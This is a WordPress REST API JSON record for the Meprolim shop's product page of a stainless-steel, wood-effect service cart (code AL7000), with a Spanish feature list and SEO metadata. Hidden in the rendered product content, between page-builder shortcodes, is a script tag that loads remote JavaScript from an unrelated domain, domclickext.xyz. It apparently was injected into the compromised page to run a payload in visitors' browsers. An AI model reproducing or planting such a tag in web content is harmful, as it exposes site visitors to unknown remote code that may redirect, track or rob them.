{"id":6400,"date":"2019-08-19T16:00:01","date_gmt":"2019-08-19T15:00:01","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=6400"},"modified":"2019-10-30T10:17:29","modified_gmt":"2019-10-30T10:17:29","slug":"carro-inoxidable-madera4-b70cm-r-160-elast","status":"publish","type":"product","link":"https:\/\/meprolim.es\/de\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas-de-2\/carros-camarera-de-2\/carro-inoxidable-madera4-b70cm-r-160-elast\/","title":{"rendered":"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. &#8211; C\u00d3DIGO: AL7000"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Ancho de bandeja 70cm.<\/p>\n<p>&nbsp;<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<ul>\n<li>Construidos en chapa de aluzinc plastificada en PVC imitaci\u00f3n madera.<\/li>\n<li>Base y bandeja superior en acero inoxidable.<\/li>\n<li>Base rodeada de goma con protecci\u00f3n.<\/li>\n<li>Cuatro protectores contra roces, en todas las esquinas.<\/li>\n<li>Soportes de bolsa inferiores abatibles.<\/li>\n<li>Asas en acero inoxidable abatibles, se pueden levantar para reducir el largo del carro.<\/li>\n<li>Refuerzo interior de acero, donde se sujetan las asas.<\/li>\n<li>Cuatro ruedas el\u00e1sticas de \u00d8 160 mm, dos fijas y dos giratorias.<\/li>\n<\/ul>\n<p><strong>SKU: AL7000<\/strong><\/p>\n","protected":false},"featured_media":6401,"template":"","meta":[],"product_brand":[],"product_cat":[319,102,1099],"product_tag":[381,380,382,379,384],"class_list":{"0":"post-6400","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-carros-camarera","7":"product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","8":"product_cat-carros-carretillas","9":"product_tag-4-bandejas","10":"product_tag-acero-inoxidable","11":"product_tag-carro-de-servicio","12":"product_tag-carro-hotel","13":"product_tag-madera","15":"first","16":"instock","17":"shipping-taxable","18":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"Construidos en chapa de aluzinc plastificada en PVC imitaci\u00f3n madera.  Base y bandeja superior en acero inoxidable.  Base rodeada de goma con protecci\u00f3n.  Cuatro protectores contra roces, en todas las esquinas.  Soportes de bolsa inferiores abatibles.  Asas en acero inoxidable abatibles, se pueden levantar para reducir el largo del carro.  Refuerzo interior de acero, donde se sujetan las asas.  Cuatro ruedas el\u00e1sticas de \u00d8 160 mm, dos fijas y dos giratorias.  SKU: AL7000\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T10:17:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/AL7000.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/\",\"name\":\"CARRO INOXIDABLE MADERA 4 B-70CM R\\\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/AL7000.jpg\",\"datePublished\":\"2019-08-19T15:00:01+00:00\",\"dateModified\":\"2019-10-30T10:17:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/AL7000.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/AL7000.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/carros-carretillas\\\/carros-camarera\\\/carro-inoxidable-madera4-b70cm-r-160-elast\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cat\u00e1logo\",\"item\":\"https:\\\/\\\/meprolim.es\\\/de\\\/catalogo\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"CARRO INOXIDABLE MADERA 4 B-70CM R\\\/160 ELAST. &#8211; C\u00d3DIGO: AL7000\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/","og_locale":"de_DE","og_type":"article","og_title":"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim","og_description":"Construidos en chapa de aluzinc plastificada en PVC imitaci\u00f3n madera.  Base y bandeja superior en acero inoxidable.  Base rodeada de goma con protecci\u00f3n.  Cuatro protectores contra roces, en todas las esquinas.  Soportes de bolsa inferiores abatibles.  Asas en acero inoxidable abatibles, se pueden levantar para reducir el largo del carro.  Refuerzo interior de acero, donde se sujetan las asas.  Cuatro ruedas el\u00e1sticas de \u00d8 160 mm, dos fijas y dos giratorias.  SKU: AL7000","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T10:17:29+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/AL7000.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/","name":"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. - C\u00d3DIGO: AL7000 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/AL7000.jpg","datePublished":"2019-08-19T15:00:01+00:00","dateModified":"2019-10-30T10:17:29+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/AL7000.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/AL7000.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/carros-carretillas\/carros-camarera\/carro-inoxidable-madera4-b70cm-r-160-elast\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/de\/"},{"@type":"ListItem","position":2,"name":"Cat\u00e1logo","item":"https:\/\/meprolim.es\/de\/catalogo\/"},{"@type":"ListItem","position":3,"name":"CARRO INOXIDABLE MADERA 4 B-70CM R\/160 ELAST. &#8211; C\u00d3DIGO: AL7000"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product\/6400","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/media\/6401"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/media?parent=6400"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_brand?post=6400"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_cat?post=6400"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/de\/wp-json\/wp\/v2\/product_tag?post=6400"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}